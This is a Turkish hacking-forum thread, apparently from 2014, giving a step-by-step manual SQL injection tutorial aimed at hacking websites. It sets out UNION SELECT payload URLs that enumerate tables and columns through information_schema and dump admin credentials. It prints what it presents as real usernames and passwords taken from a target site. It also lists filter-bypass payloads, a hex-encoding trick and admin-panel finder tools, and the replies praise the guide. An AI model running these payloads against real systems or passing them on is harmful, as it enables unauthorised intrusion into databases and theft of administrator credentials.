Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
SQL Injection Ayrıntılı Anlatım
#1
Selamun Aleyküm Rahmetullahi Ve Berekatuh

BİSMİLLAHİRRAHMANİRRAHİM

Anlatacağım Konu Sql İnj Üzerine Çünkü Bakıldığı Zaman Görüle Bilirki Sql İnj Kullanamayıp Havij Ve Benzeri Yazılımlarla Site Hack Yapan Arkadaşlarımız Var Onlar İçin
Hazırlamak İstediğim Dökümanı Sizlere Sunmak İstedim Manuel Hem Zevkli Hemde Daha İyi Attack"lar Yaptığınızı Anlamak Açısından Manuel Önerilmeli Tabiki.

Konu Tamamen Bana Aittir.
---------------------------------------------------------
Sql İnj Dökümanında Neler Mevcut

1) Hedef Site Üzerinden Hata Almak

2) Hedef Site Tablo Sayısı Bulmak

3) Tablo Sayılarını Ve Tablo İsimlerini Çekmek

4) Kolon İsimlerini Çekmek

5) Size Tavsiye Edeceğim Admin Panel Bulucu Programlar

6) Bypass Yöntemleri

7) Kolon İsmi Hexlemek
---------------------------------------------------------

1) Hedef Site Üzerinden Hata Almak

Vazgeçilmezimiz " 'a " Veya ' Tırnak İşaretleriyle Hedef Sitemiz Üzerinden Hata Almaya Çalışırız. Konu Üzerine Bir Görüntü Paylaşmak İstiyorum İzninizle.

www.deccal.org

Hata Bu Şekilde Almaya Çalışırız Ve Hatamızdanda Bir Görüntü Paylaşmak İstiyorum.

www.deccal.org

İnşaALLAH Bu Konuyu Açıklığa Kavuştura Bilmişizdir.

2) Hedef Site Tablo Sayısı Bulmak

Çoğunlukla Kullandığımız Komut "order+by+1--" Bir Örnek Vermek İstiyorum "www.hedef.com/news.php?ID=29+order+by+1--" Dilerseniz Birde Resimle Örnek Verelim
Daha İyi Anlaşılması İçin.

www.deccal.org

Evet Görüldüğü Üzeri "order+by+1--" Komutu Kullandık Ve Hata Sayfamız Gitti Evet Bu İyi"ye İşaret Demek Oluyorki Tablo Sayımız 1 Veya 1 Sayısının Üzerinde Hata Alana Kadar
Sayıları Artıracağız "order+by+1--" Demiştik Devam Edelim "Bunu order+by+2-- , order+by+3--" Diyerek Artırıyoruz Hata Alana Kadar Devam Etmeliyiz Çünkü Tablo Sayısının Bittiği Yer Hata
Aldığımız Yerdir Bu Örneğin Daha İyi Anlaşılması İçin Hedef Sitemizden Resimli Örnek Gösterelim.

www.deccal.org

Evet Görüldüğü Üzeri "+order+by+13--" Yapmama Rağmen Hata Almadım Hata Alana Kadar Devam Edecez.

www.deccal.org

Evet "+order+by+14--" Yapınca Bir Hata Mesajı Aldık Ve 14 Tablo Bulunmadığını Belirtiyor Bu Demek Oluyorki 13 tablo Var Sitede Ve Tablo Sayımız "13" Olmaktadır.

3) Tablo Sayılarını Ve Tablo İsimlerini Çekmek

Evet 13 Tablo Bulmuştuk Onun Üzerinden Kafa Karıştırmadan Devam Edelim.

Hemen Bir Örnek Vermek İstiyorum Biz 13 Tablo Tespit Etmiştik Hedef Sitemiz Üzerinden
Kod:
http://www.hedef.com/news.php?ID=29+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--

Burda Kullandığımız Komut Şu "+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--" Evet 13 Kolon Tespit Etmiştik "Union" Ve "Select" Komutuyla Bu Sayıları 1"den 13"e Kadar

Sıraladık Ve Tablo Sayımızı Bulmak İçin Bize Tablo Sayımızı Verdi " 5 " Ve " 6 " Sayılarını Verdi İstediklerimiz Bunun İçinde Saklanmış Durumda Bu Konuyu Atlamadan Daha İyi

Anlaşılması İçin Resimli Bir Örnek Vermek İstiyorum.

www.deccal.org

Devam Edelim Şimdi İse Bu " 5 " Sayısının Altında Gizlenen Bilgilerimizi Yani Tablo İsimlerimizi Çekelim. Hemen Nasıl Çekeceğimiz Hakkında Örnek Vermek İstiyorum

Kod:
http://www.hedef.com/news.php?ID=29+union+select+1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13+from+information_schema.tables+where+table_schema=database()--

Komutumuzla Tablo İsimlerimizi Çekiyoruz Burda Kullandığımız Komutlar
Kod:
+union+select+1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13+from+information_schema.tables+where+table_schema=database()--

Evet Bu Komut İle Tablo isimlerimizi Veri Tabanından Çekmiş Olduk İsterseniz Bunu Resimli Örneğimizle Daha Açıklayıcı Bir Hale Çevirelim.

www.deccal.org

Görmüş Olduğunuz Üzeri Tablo İsimlerimizi Şu Komutumuzla Çektik

Kod:
http://www.hedef.com/news.php?ID=29+union+select+1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13+from+information_schema.tables+where+table_schema=database()--

Ve Bize Vermiş Olduğu Tablo İsimleri Şunlar :
Kod:
cms_admins,cms_home,cms_lingua,cms_menu,cms_menu_admin,cms_menu_utente,cms_news,cms_news_tipo,cms_pagine,cms_prod_categoria,cms_prod_sottocat,cms_prodotti

4) Kolon İsimlerini Çekmek

Evet İsterseniz Tüm Tabloları Göre Bilirsiniz Şu Komutumuzla Görebiliriz Tabi
Kod:
http://www.hedef.com/news.php?ID=29+union+select+1,2,3,4,group_concat(column_name),6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_schema=database()--

Dikkatinizi Çekmiştir "group_concat(table_name)" yaptığımız yeri "group_concat(column_name)" Olarak Değiştirdik Birde Şu Kısmı "information_schema.tables" Olan Yeri " information_schema.columns" Olarak Değiştirdikten Sonra

Kolonları Çektiğinizi Fark Edeceksiniz.

Bize Şimdilik Gerekli " csm_admins " Olarak Gözüküyor Neyse Devam Edelim Sadece Bu Tablomuzla Bakalım Bize Vereceği Kolonların İçinde Username,Password Veya Ona Benzer
Herhangi Bir Seçenek Varmı Diye Kontrol Edelim.

Şu Komutumuzla Kontrol Ediyoruz =
Kod:
http://www.hedef.com/news.php?ID=29+union+select+1,2,3,4,group_concat(column_name),6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_schema=database()+and+table_name=x0636D735F61646D696E73--

Şimdi Şu Komutu Biraz Açalım Neler Ekledik Ve Sadece Bu Kolonu Çekebildik
Kod:
+union+select+1,2,3,4,group_concat(column_name),6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_schema=database()+and+table_name=x0636D735F61646D696E73--

Fark Ettiniz Değilmi "database()" Komutunun Sonuna Şu Komutları Ekledik "+and+table_name=0x636D735F61646D696E73" Buda Neyin Nesi Derseniz " 636D735F61646D696E73 " Bu " csm_admins " Kolonun Hexlenmiş Hali
Hex"e Şimdi Değinmek Doğru Olurmu Bilmiyorum Kafanızın Karışmaması Açısından Şimdi Değinmiyelim Siz Hex"i Araştırın Veya Sonlarda Değinelim.
Evet "csm_admins" İçindeki Bilgileri Çektik Bilgilerimiz Şunlar : " ID,uid,pwd,generali " Daha Açıklayıcı Hale Getirmek İçin Resim Paylaşmak İstiyorum.

www.deccal.org

Evet Görmüş Olduğumuz Gibi " csm_admins " İçindeki Bilgileri Çektik Ama Pwd Password Olduğunu Zannediyorumda Username Nerde exciting Neyse Devam Edelim

En Son Çektiğimiz Bilgiler Şunlardı Hatırlatmakta Fayda Var " ID,uid,pwd,generali " Şunları Çekelim Ve Bakalım Username Ve Password Bilgilerini Elde Edebilecekmiyiz

Şu Komutumuzla Elde Etmeye Çalışalım Bilgilerimizi
Kod:
http://www.hedef.com/news.php?ID=29+union+select+1,2,3,4,group_concat(uid,0x3a,pwd),6,7,8,9,10,11,12,13+from+cms_admins--

Evet Bilgilerimizi Çektik Ve Bilgiler :" Username = i-deas Şifre = 0501BT65 , Username = matteo Şifre = @merba.2k13 "

Görünen O Ki 2 Admin Var Sitede MaşaALLAH exciting

Daha Açıklayıcı Bir Hale Getirmek İçin Aldığımız Görüntüyü Paylaşmak İstiyorum.

www.deccal.org

Ve İşte Bu Kadar Şimdi Admin Panelini Bulmak Kaldı

5) Size Tavsiye Edeceğim Admin Panel Bulucu Programlar

1) Havij 400 Küsür Panel Taratıyor Azda Olsa Bazen İşimize Yarıyor.

2) Size Tavsiye Edeceğim Federiko Kardeşimizin Yazılımı Gerçekten İşe Yarıyor Ellerine Sağlık Tekrar Tebrik Etmek İstiyorum Kendisini.
Link : http://www.cyber-warrior.org/Forum/feder...2933,0.cwx Şu Konudan Ulaşa Bilirsiniz

3)Acunetix Web Vulnerability Scanner Gibi Site Linklerini Taratan Yazılımlar Panel Bulucuların Tıkandığı Yerde Bu Tür Yazılımlar Devreye Girer İşe Yarıyor Çoğu Zaman

6) Bypass Yöntemleri

Bypass Tipler

1)
Kod:
id=1')+order+by+1--+

2)
Kod:
+/*union*/+/*select*/+1,2,3,4,5,6,7,8,9--

3)
Kod:
/*!50000union*/+/*!50000select*/+

4)
Kod:
news.php?ID="-"29

Bypass Türlerini Kullanacağımız Yerler

1) Bu " id=1')+order+by+1--+ " Bypass Türü Genellikle Hataları Göremediğimiz Hedef Siteler Üzerinde Çok Etkili Oluyor.

2) Bu " +/*union*/+/*select*/+1,2,3,4,5,6,7,8,9-- " Bypass Türü İse Fobiden Gibi Korunma Altına Alınan Sitelerde Etkili Oluyor.

3) Bu " /*!50000union*/+/*!50000select*/+ " Bu Bypass Türü İse 2.Bypass Türünün İşi Yaramadığı Yerlerde Devreye Giriyor.

4) Bu " news.php?ID="-"29 " Evet Bu Anlatımda İşimize Yaramadı Ama Çoğu Zaman Yarıyor Tabloları Göremediğimiz Zaman Bu Devreye Giriyor "id=2" id Değerinin Yanında Bulanan
Rakamın Önüne " - " Koyulduğu Zaman Tabloları Rahatlıla Göre Biliriz Çoğu Zaman İşe Yarıyor "id=-2" Gibi.

7) Kolon İsmi Hexlemek

Evet Arkadaşlar Konuda Değindiğim Gibi Tablo Hexlemeyi Son Rutuşlarda Göstereceğimi Belirtmiştim.

username Ve Password Bu Kolonun İçinde " cms_admins " Ve Şunu Hexleyip Sadece Bu Kolonu İçindeki Bilgileri Almak İstiyoruz.

Hemen Hex Sitesine Giriyoruz Kullandığım Hex Sitesi : http://www.convertstring.com/EncodeDecode/HexEncode

Hemen Nasıl Hexliyeceğimiz Resim İle Gösterelim

www.deccal.org

HexEncode Dedikten Sonra Altaki Kutumuza Hexli Hali Gelecektir Onuda Görüntüyle Belirtelim.

www.deccal.org


Evet Hexledik Şimdi Bunu İcraate Dökelim

Hexli Hali : 636D735F61646D696E73

Hem Bir Örnek Verelim

Örnek =
Kod:
http://www.hedef.com/news.php?ID=29+union+select+1,2,3,4,group_concat(column_name),6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_schema=database()+and+table_name=x0636D735F61646D696E73--

Hex"i Şu Şekilde Kullanıyoruz "database()"den Hemen Sonra Devam Edelim "+and+table_name=x0636D735F61646D696E73" Diye Devam Ettikmi Username Ve Password Az Önce Elde Ettiğimiz Gibi
Elimizde Olur İnşaALLAH.


Evet Arkadaşlar Konumuz Bitti Elhamdurillah.

Şüphesizki Yanlışlar Şeytandan Ve Nevsimdendir Doğrular İse Alemlerin Rabbi Olan ALLAH"tandır.

Yanlışlarım Olmuştur İllaki Kusuruma Bakmazsınız İnşaALLAH Elimden Geldiğince Ve Bilgimin Olduğu Kadar Sizlerle Paylaşmak İstedim Yanlışlarımdan Dolayı Lütfen Kusuruma Bakmayın.

Faydalı Olur Bilmiyen Kardeşlerim İçin İnşaALLAH.

Gayret Bizden Başarı Yanlızca ALLAH"tandır.

Bizelere Dua Edin İnşaALLAH Selamun Aleyküm Rahmetullahi Ve Berekatuhu.
#2
eline saglık kardesım
Beğenenler:
#3
Ufak Bir Faydaya Vesile Olabilmişsek Ne Mutlu Bize.
Beğenenler:
#4
eline saglık
İnsɑnlɑr değişmez değişen tek şey şɑrtlɑr ve çıkɑrlɑr...
Beğenenler:
#5
(27-07-2014, Saat: 03:38)H4CK4L Adlı Kullanıcıdan Alıntı: eline saglık

ALLAH Razı Olsun Kardeşim.
Beğenenler:
#6
eline sağlık güzel anlatım olmuş exciting
Görsel ve anlaşılır exciting
Beğenenler:
#7
(27-07-2014, Saat: 03:59)Mentalistler Adlı Kullanıcıdan Alıntı: eline sağlık güzel anlatım olmuş exciting
Görsel ve anlaşılır exciting

Teşekkür Ederim Kardeşim ALLAH Razı Olsun. exciting
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  2016 Güncel Exploit Dökümanı + Videolu Anlatım KingSkrupellos 5 278 04-12-2016, Saat: 00:31
Son Yorum: DeaTHKNighT33
  Sql Enjeksiyon Admin Authentication Login ByPass Geniş Resimli Videolu Anlatım KingSkrupellos 8 2,294 30-11-2016, Saat: 19:52
Son Yorum: Kolonkun
  SuspendedPage.Cgi Hacking Yöntemi Konu Anlatım KingSkrupellos 5 145 30-11-2016, Saat: 11:07
Son Yorum: Efetimi
  Sadrazam Shell'de Log Tespiti ve Log Kaydını Silme Yöntemi Detaylı Resimli Anlatım KingSkrupellos 9 289 29-11-2016, Saat: 15:41
Son Yorum: Efetimi
  WordPress File Download Vulnerability (Videolu Anlatım) Mr.F92 25 1,036 27-11-2016, Saat: 20:23
Son Yorum: AhmetGazi
Anahtar Kelimeler

SQL Injection Ayrıntılı Anlatım indir, SQL Injection Ayrıntılı Anlatım Videosu, SQL Injection Ayrıntılı Anlatım Online izle, SQL Injection Ayrıntılı Anlatım Bedava indir, SQL Injection Ayrıntılı Anlatım Yükle, SQL Injection Ayrıntılı Anlatım Hakkında, SQL Injection Ayrıntılı Anlatım Nedir, SQL Injection Ayrıntılı Anlatım Free indir, SQL Injection Ayrıntılı Anlatım Oyunu, SQL Injection Ayrıntılı Anlatım Download


1 Ziyaretçi